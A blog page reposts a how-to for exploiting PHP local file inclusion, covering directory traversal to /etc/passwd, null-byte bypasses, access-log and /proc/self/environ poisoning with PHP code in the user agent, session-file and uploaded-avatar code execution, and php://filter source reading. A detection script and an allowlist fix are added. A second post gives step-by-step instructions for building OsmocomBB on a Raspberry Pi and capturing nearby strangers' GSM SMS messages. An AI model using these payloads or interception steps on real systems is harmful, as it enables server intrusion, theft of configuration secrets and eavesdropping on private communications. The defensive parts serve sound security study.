Wednesday, June 7, 2017

Local File Inclusion Exploitation Techniques

Reposted from: https://ddxhunter.wordpress.com, original title: LFI’s Exploitation Techniques. The summary is very thorough, but I have not had time to translate it and have only added a few notes.

What’s a Local File Inclusion?

A local file inclusion (usually called “LFI”) is a web hacking technique that simply allows including files from a local location. That means we can include a file that is outside the web directory (if we have the rights) and execute PHP code.

<?php include($_GET['page']);?>

This code will look up the GET variable “page”, then include and execute the page it specifies. If you want an example, you’ve surely already seen a website with something like “index.php?page=news.php”; that’s it, in a lot of cases that is an include. To start including files locally, we’ll use “../”, which lets us go one directory up from the current one. We’ll try to include the file /etc/passwd; well, it’s not always readable, but it’s a good start. We’ll use “../” to go up to the root, then load /etc/passwd.

http://sitelambda.com/index.php?page=../../../../../../../../../../etc/passwd

I personally prefer using “./” before the page name to check whether there’s an exploitable local file inclusion (example: index.php?page=news.php » index.php?page=./news.php; if it works, there’s most likely an LFI), but it won’t always work. Note that /etc/passwd will only work on Linux systems.

The null byte technique.

In most cases the webmaster will not do an include like that; he’ll prefer to append “.php” himself to the inclusion. (Well, we can say that index.php?p=news is prettier than index.php?p=news.php.) He’ll use code like this:

<?php include($_GET['page'].".php");?>

So this time PHP will again include a page from the GET variable page, but it’ll add .php at the end. To bypass this restriction, we’ll use the null byte. The principle of the null byte is that it is a string terminator character: everything after the null byte is dropped. To use it, you’ll need a website with magic quotes off. The URL-encoded character is “%00” (the browser will automatically translate it), so, for example, this time we’ll have to use this:

http://sitelambda.com/index.php?page=../../../../../../../../../../etc/passwd%00

It’ll include /etc/passwd perfectly; the .php will be cut off by the null byte.

And now that I got a LFI, what should I do?

I actually know only 4 LFI exploitation techniques; here they are:

The access.log

The principle is simple: we’ll include the log file that records all web connections to the server. In our case it’ll be access.log, but it can also be access_log, or any name in fact (you’ll have to look at the apache/httpd configuration to know the log file name).

http://site.com/<? phpinfo(); ?>

You’ll have to request something like that; the server will log it in the access_log, and when you include the log, the code will be executed. Note that your browser automatically URL-encodes special characters, so you’ll have to request that URL with a script that won’t auto-encode. If you go with your browser, it’ll be logged as something like: %3C? phpinfo(); ?%3E.

By the way, I think the user agent is not URL-encoded, so you can modify it and try with that.

The /proc/self/environ

It’s my favorite one. Try to include /proc/self/environ; you will see a list of the current process’s variables (well, if you have the rights to include that file, which is not often the case). You’ll see something like this if you’re on Mozilla:

HTTP_USER_AGENT=Mozilla/5.0

Why is it interesting? Because you can change your user agent to whatever PHP code you want. How? Go to “about:config” (type it in your Firefox browser), create a new string entry with these values: “general.useragent.override” for the name, and “<? phpinfo(); ?>” for the value. (Note that some tools do it automatically, like User Agent Switcher.) Reload the page, and you’ll see a phpinfo instead of “Mozilla/5.0”.

The PHP Sessions Exploitation.

Another exploitation is the sessions exploitation. If the site uses PHP sessions (phpsessid, etc.), you can include them, and if you can modify the data, it’ll be easy to execute code. You’ll have to include sess_[your phpsessid value]. Most of the time it is in /tmp, but you can sometimes also find it in /var/lib/php5/, etc. The data stored in the session can be anything (like a name given at registration, an option you chose).

Note: the PHP session directory can be seen in the session.save_path field of the phpinfo() page. On Debian, the default session path for php5-fpm is /var/lib/php5/sessions. Session files are named “sess_” + PHPSESSID, and the file content is: session variable name + “|” + variable type + “:” + variable length + “:” + variable value + “;”. For example, the session $_SESSION[‘test’] = ‘google’ is stored in the file as: test|s:6:”google”;

index.php?p=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7%00

I suggest you browse around a little before trying to include the phpsessid: touch everything, modify options, etc.

The upload

We don’t often hear of it, but it’s the easiest technique. Just upload a file that contains PHP code and include it. Example: there’s a forum on the site where you’re trying LFIs; upload an avatar modified to contain PHP code (hex-edit it, and modify only the middle of the data, so the forum will still recognize it as an image). Find the right path and include your avatar; tada, your code is executed.

Read a file with LFI

There’s a technique that will allow us to “read” a file with an LFI. (An interesting file to check would be the config.php file, which normally is only executed, not shown.) We’ll use PHP filters to do it:

Note: using a php:// wrapper inside include requires allow_url_include to be enabled in php.ini.

index.php?page=php://filter/read=convert.base64-encode/resource=config

This will base64-encode the resource “config” (as if it were index.php?page=config, but base64’d). With that, the code won’t be executed, and you can base64_decode() it afterwards to get the original config.php file. This method doesn’t need magic quotes, but you’ll need PHP version 5 or higher.
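The two previous sections (log poisoning through access.log or the user agent in /proc/self/environ, and the php://filter read) all leave a recognizable trace in the web server’s own access log. The following script is an added example, not part of the original post: it scans Apache combined-format log lines for those indicators (traversal, a null byte, a php:// wrapper in a parameter value, /proc/self/environ, session and log file names, and a PHP open tag inside the user agent). The log lines at the bottom are constructed for illustration and are not real traffic.

```php
<?php
// Added example (not from the original post): flag Apache combined-format
// access log lines that carry the LFI indicators described in the text.
// The sample lines at the bottom are constructed, not real traffic.

declare(strict_types=1);

// Indicators applied to the percent-decoded request target.
const LFI_INDICATORS = [
    'path traversal'  => '#(^|[/\\\\])\.\.([/\\\\]|$)#',
    'null byte'       => '#\x00#',
    'php wrapper'     => '#[?&][^=&]*=php://#i',
    'process environ' => '#/proc/self/environ#i',
    'session file'    => '#/sess_[A-Za-z0-9,-]+#',
    'log file'        => '#(access|error)[._]?log#i',
];

// Indicator applied to the raw user agent: a PHP open tag means log poisoning.
const UA_INDICATOR = '#<\?(php|=)?#i';

/** Split one combined-format line into [request target, user agent]; null if unparseable. */
function parse_log_line(string $line): ?array
{
    $re = '#"[A-Z]+ (\S+) HTTP/[\d.]+" \d{3} \S+ "[^"]*" "([^"]*)"\s*$#';
    return preg_match($re, $line, $m) ? [$m[1], $m[2]] : null;
}

/** Return the indicator labels matched by one log line (empty array = looks benign). */
function lfi_indicators(string $line): array
{
    $parsed = parse_log_line($line);
    if ($parsed === null) {
        return [];
    }
    [$target, $ua] = $parsed;
    $decoded = rawurldecode($target);   // "%2e%2e%2f" -> "../", "%00" -> "\0"
    $hits = [];
    foreach (LFI_INDICATORS as $label => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $label;
        }
    }
    if (preg_match(UA_INDICATOR, $ua)) {
        $hits[] = 'php tag in user agent';
    }
    return $hits;
}

// Constructed sample lines (not real traffic).
$sample = [
    '10.0.0.5 - - [07/Jun/2017:10:00:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [07/Jun/2017:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [07/Jun/2017:10:00:03 +0000] "GET /index.php?page=../../../proc/self/environ HTTP/1.1" 200 2210 "-" "<?php phpinfo(); ?>"',
    '10.0.0.9 - - [07/Jun/2017:10:00:04 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 2990 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [07/Jun/2017:10:00:05 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2ftmp/sess_tnrdo9ub2tsdurntv0pdir1no7 HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
];

foreach ($sample as $line) {
    $hits = lfi_indicators($line);
    if ($hits !== []) {
        printf("ALERT %s: %s\n", implode(', ', $hits), $line);
    }
}
```

Decoding the target once before matching is what catches the double-encoded forms (“%2e%2e%2f”, “%00”); the user agent is matched raw because, as the text notes, it is logged as sent. Run it with `php scan.php` against a real log by replacing `$sample` with `file('access.log')`.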

Special cases

Sometimes, even if you can read /etc/passwd, it is not an include. For example, when they use readfile() in PHP, it’ll load the file, but PHP code won’t be executed. That’s a problem for executing PHP code, but it gives you an advantage on one point: you can read config files.

index.php?page=./forum/config

Then show the source of the page (CTRL+U) to have the code.

The “Does a folder exist” trick.

If you have an LFI, a good technique to find out whether a folder exists is simply to enter it, then go back out of it. Example:

index.php?page=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00

How to protect from LFIs?

Well, first, activate magic quotes; it’s not the “perfect solution”, but it’ll help. Then you should also set open_basedir so PHP can only read inside your web folder and /tmp, and you should also write a function that filters the “/”, “.” and “%00” characters.

But well, the best option is the non dynamic include.

if ($_GET['page'] == "news") {include("news.php");} else {include ("accueil.php");}
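The static include above generalizes to an allowlist: the request supplies a token, the token is mapped to a file name the developer chose, and the user-controlled string never reaches include(). The following is an added example, not code from the original post; the `pages/` directory and the page names in the map are illustrative assumptions.

```php
<?php
// Added example (not from the original post): allowlist-based page inclusion.
// Assumes pages live in a "pages/" directory next to this script; the tokens
// and file names below are illustrative.

declare(strict_types=1);

// Only these tokens may ever reach include(); the request never supplies a path.
const PAGES = [
    'news'    => 'news.php',
    'accueil' => 'accueil.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page token to an absolute path inside $baseDir,
 * or return null when the token is unknown or the resolved path escapes.
 */
function resolve_page(string $token, string $baseDir): ?string
{
    if (!isset(PAGES[$token])) {
        return null;                   // "../", "%00", "php://" are simply unknown tokens
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$token]);
    if ($base === false || $path === false) {
        return null;                   // base directory or page file does not exist
    }
    // Defence in depth: even a mis-edited PAGES entry cannot point outside $baseDir.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$token = $_GET['page'] ?? 'accueil';
// page[]=x arrives as an array; treat anything that is not a string as unknown.
$file = resolve_page(is_string($token) ? $token : '', __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

The realpath comparison is a second layer, not the primary control; the allowlist is what removes the vulnerability. Note also that the two mitigations named first in the text are no longer available on current PHP: include() has rejected paths containing a NUL byte since PHP 5.3.4, and magic quotes were removed in PHP 5.4, so neither should be relied on.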

Saturday, February 13, 2016

Monday, April 13, 2015

Osmocombb on the Raspberry Pi

I had heard of Osmocombb long ago, and recently I put together a simple hardware setup to play with it. Osmocom stands for Open Source mobile communication; BB is one of its sub-projects. The name BB doesn’t say much, but the project is genuinely impressive: it is an open-source implementation of the GSM protocol stack. Although the project says the GSM hardware layer is not open-sourced, everything above the physical Layer 1, that is Layer 2 and Layer 3, has been thoroughly hacked. In terms of results, it makes radio eavesdropping on GSM networks, base-station hijacking, fake base stations and other impressive features very easy. Put plainly, you can use common hardware to eavesdrop on mobile phone communications at extremely low cost (around 100 RMB in total on Taobao).

Many experts have written Osmocombb references before, but my setup is a bit different. Most of them run Linux in a virtual machine as the Osmocombb environment, while my laptop already runs Linux. Since an arm-elf cross-compilation environment has to be set up, and I didn’t want to pile up on my personal PC things that are used once and hard to remove completely, I built everything on a Raspberry Pi. Because this differs somewhat from most material online, I am writing it up as a record.

0x00 Hardware

A Moto C118 phone from years ago dug out at home, a MiniUSB cable bought on Taobao, a C118 flashing cable, an FT232RL board, and the core piece, the Raspberry Pi (mine was bought fairly early; it is a first-generation Model B, running Raspbian).

0x01 Overview of the process

First build an arm-elf gcc compiler on the Pi, then use that compiler to build the libosmocore library as the cross-compilation environment. On that basis, build the Osmocombb main program. The built Osmocombb includes a set of firmware to flash into the C118. Connect the Raspberry Pi and the C118 through the FT232 and flash the firmware; the C118 then becomes a GSM modem, and you can run Osmocombb and start playing.

0x02 Setting up the build environment and building

First SSH into the Pi.

Install dependencies:

apt-get install build-essential libgmp3-dev libmpfr-dev libx11-6 libx11-dev texinfo flex bison libncurses5 libncurses5-dbg libncurses5-dev libncursesw5 libncursesw5-dbg libncursesw5-dev zlibc zlib1g-dev libmpfr4 libmpc-dev

Download the build script and the compiler sources:

wget http://bb.osmocom.org/trac/raw-attachment/wiki/GnuArmToolchain/gnu-arm-build.2.sh
mkdir build install src
cd src/
wget http://ftp.gnu.org/gnu/gcc/gcc-4.5.2/gcc-4.5.2.tar.bz2
wget http://ftp.gnu.org/gnu/binutils/binutils-2.21.1a.tar.bz2
wget ftp://sources.redhat.com/pub/newlib/newlib-1.19.0.tar.gz

Build:

cd ..
./gnu-arm-build.2.sh

Because this is a Raspberry Pi, it is far slower than a PC. I built it at night: I started the build script and went to bed, and it was finished when I checked the next morning.

Add the compiler path to PATH:

export PATH=$PATH:~/install/bin

Download and build libosmocore:

git clone git://git.osmocom.org/libosmocore.git
cd libosmocore/
autoreconf -i
./configure
make
sudo make install
cd ..
sudo ldconfig

Build Osmocombb:

According to others’ notes, the master branch fails to build, and most people use the luca/gsmmap branch. I haven’t looked into the details, but this branch provides LBS positioning based on the sniffed data (impressive!).

git clone git://git.osmocom.org/osmocom-bb.git
cd osmocom-bb
git checkout --track origin/luca/gsmmap

Built as-is, Layer 2 and Layer 3 cannot transmit. That doesn’t matter for pure eavesdropping, but if you need more advanced functions, a few build switches must be enabled:

cd osmocom-bb/src/target/firmware/
vi Makefile
Modify the following content (uncomment the CFLAGS line):

# Uncomment this line if you want to enable Tx (Transmit) Support.
-#CFLAGS +=-DCONFIG_TX_ENABLE
+CFLAGS +=-DCONFIG_TX_ENABLE

Build:

cd src/
make

0x03 Connecting the hardware

Connect the phone, the FT232 and the MiniUSB cable together. The phone must be powered off. One thing to note: the black wire of the flashing cable goes to the FT232’s GND, the white and red wires go to the input (RX-I) and output (TX-O) respectively, and the 3.3V external power pin is not used.

Then run lsusb on the Pi to find the FT232’s port; it usually seems to be ttyUSB0, as it is on my PC too. Then go to the osmocom-bb/src/host/osmocon directory and run:

sudo ./osmocon -p /dev/ttyUSB0 -m c123xor ../../target/firmware/board/compal_e88/layer1.compalram.bin

0x04 Flashing the firmware

Then press the phone’s power key once. The program will try to communicate with the modem (C118); if there is no connection problem it will pause, and pressing the power key again flashes the firmware. The firmware flashed here lives only in the phone’s RAM; after a reboot it goes back to being a normal phone. After a successful flash the phone displays:

0x05 Playing

Do not close the flashing program after the flash completes, because it still handles the communication between the Pi and the C118. Open another terminal, SSH into the Pi, go to the osmocom-bb/src/host/layer23/src/misc directory and run:

sudo ./cell_log -O

The program then searches for base stations near you,

and the scan results appear. ARFCN can be understood as the base station’s channel number (details: Absolute radio-frequency channel number), PWR is the signal strength, and MCC and MNC are the country code and network code respectively (details: Mobile country code); China Mobile is 00 and China Unicom is 01. Then pick the ARFCN of the base station you want to sniff and run, in the same directory:

sudo ./ccch_scan -i 127.0.0.1 -a 1

Start capturing!

Then the captured data needs to be saved. Open another terminal, SSH in, and pick any directory for the capture file. To make it convenient to download the capture and analyze it locally with Wireshark, use dumpcap on the Pi to save it; first make sure tshark is installed on the Pi (you most likely won’t install Wireshark there):

sudo apt-get install tshark

Then:

sudo dumpcap -i lo -w logfile.log

From my experience over several runs, getting three to five displayable SMS results usually takes around 20,000 packets (maybe because my school is in too remote a spot). Once enough has been captured, download the capture from the Pi with scp, open it in Wireshark, and set the filter to gsm_sms:

This is the result after waiting about two hours; expanding one:

The SMS content can be read directly. That feels great. Reportedly China Mobile and China Unicom turned GSM encryption off to reduce their operational load, so your SMS are transmitted by these operators in the clear over the air (shady merchants!). That said, even with encryption enabled, GSM’s A5 cipher was broken long ago, and the algorithm is posted online: http://mtlin.org/article/a51.html

0x06 A bit of follow-up

I can only capture the base station’s downlink packets here, not the phone’s uplink. Getting the uplink requires a hardware modification: see reference link. I didn’t find a handy tool for it, so I skipped this step. Also, to capture all nearby GSM traffic comprehensively you may need a dozen C118s, since one phone can only follow one base station.

One last thing: don’t use this for bad purposes; be a law-abiding citizen.
